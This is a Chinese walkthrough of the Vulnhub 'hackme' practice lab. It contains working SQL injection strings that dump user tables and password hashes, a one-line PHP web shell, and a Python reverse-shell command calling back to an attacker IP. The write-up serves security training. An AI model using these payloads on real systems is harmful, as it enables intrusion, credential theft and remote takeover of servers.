Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

admin 2025年3月5日21:08:10评论10 views字数 2388阅读7分57秒阅读模式

一、靶机搭建

选择扫描虚拟机

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

选择路径即可

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

二、信息收集

靶机信息

Name: hackme: 1
Date release: 18 Jul 2019
难度:初级,目标是通过web漏洞获得有限的权限访问,随后权限以root身份升级。这个实验室是为了模拟现实生活环境而创建的。 
“hackme”使用DHCP,在mysqld可能自行关闭的情况下(非常罕见的情况),尝试强制重启机器,随后它应该可以正常工作。 
hint:本节介绍已收集到的有关该版本的各种信息,例如网页和/或自述文件中的引文。 

扫ip

靶机ip:192.168.108.150

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

扫开放端口和服务

开放了22和80端口

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

信息如下:

22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))

指纹探测

使用以下命令

nmap 192.168.108.150 -p 22,80 -sV -sC -O --version-all 
Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

信息如下:

运行系统: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS 详情: Linux 3.2 - 4.9
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

先看看dirb扫描

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

试试dirsearch扫描

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

信息如下:

http://192.168.108.150/uploads        #文件上传
http://192.168.108.150/config.php     #配置信息
http://192.168.108.150/login.php       #登录界面
http://192.168.108.150/logout.php      #登出界面
http://192.168.108.150/register.php    #注册界面

三、Web渗透

信息收集

主页面

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

由于其他页面无法正常访问,只有一个uploads,也没有什么可以利用的信息

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

回去注册一个账户并登录

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

是一个查询界面,查询书名

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

点击search先看看,看来有数据库,可能是sql注入

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

抓包看一下,存在注入点

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

sql注入

判断类型

无回显,看来需要注释符

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

字符型注入

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

由于之前search查询出来的结果,该数据库存在三个字段

爆数据库名和版本号

-1' union selectversion(),database(),3#
数据库:webapphacking
Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

爆表名

-1' union selectgroup_concat(table_name),2,3from information_schema.tables where table_schema="webapphacking"#
数据表名称:books,users
  • group_concat():将多行的结果合并到一行
  • information_schema.tables:是一个系统数据库,它存储了所有数据库、表、列等的元数据。在这里,攻击者查询的是tables表,目的是获取所有表的名字。
  • table_schema:指定数据库名称
Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

爆users表下的列

获取users表的列名

-1' union selectgroup_concat(column_name),2,3from information_schema.columns where table_name="users"#
id,user,pasword,name,address

group_concat():将多行的结果合并到一行

select group_concat(column_name),2,3:将结果输出全部在第一字段里,2和3是为了填充查询列,避免出错

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

获取users表下的用户和密码

-1' union selectgroup_concat(user),group_concat(pasword),3fromusers#

这里有很多用户以及他们密码的md5值,我们看比较重要的,superadmin2386acb2cf356944177746fc92523983

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

查询一下,密码:Uncrackable

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

文件上传

重新登录

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

如下,有一个文件上传点,结合之前扫描出来的文件上传页面进行文件上传

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

访问uploads界面,可以正常上传,且可以访问

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

上传一个php文件,名为nc.php

track
<?php system($_GET["a"]); ?>

上传成功

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

执行一下系统命令试试,成功执行

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

文件上传反弹shell

kali开启监听

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

利用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.108.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

反弹成功

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

四、提权

进入环境先信息收集一波,不过目录是web服务下的,没什么可用信息

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

进入**/home** 目录查看,发现两个可疑文件夹,hackme和legacy,访问hackme看看

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

存在两个可疑文件,但不知道怎么利用,进入另一个目录看看,发现一个脚本

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell
  • s:设置用户ID位(setuid),表示当用户执行这个文件时,进程将以文件所有者的权限运行。

ok,直接把提权脚本给我们了,执行该脚本

Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

提权成功

end

原文始发于微信公众号(泷羽Sec-track):Vulnhub-Hackme靶机-sql注入+文件上传+反弹shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月5日21:08:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-Hackme靶机-sql注入+文件上传+反弹shellhttp://cn-sec.com/archives/3796344.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息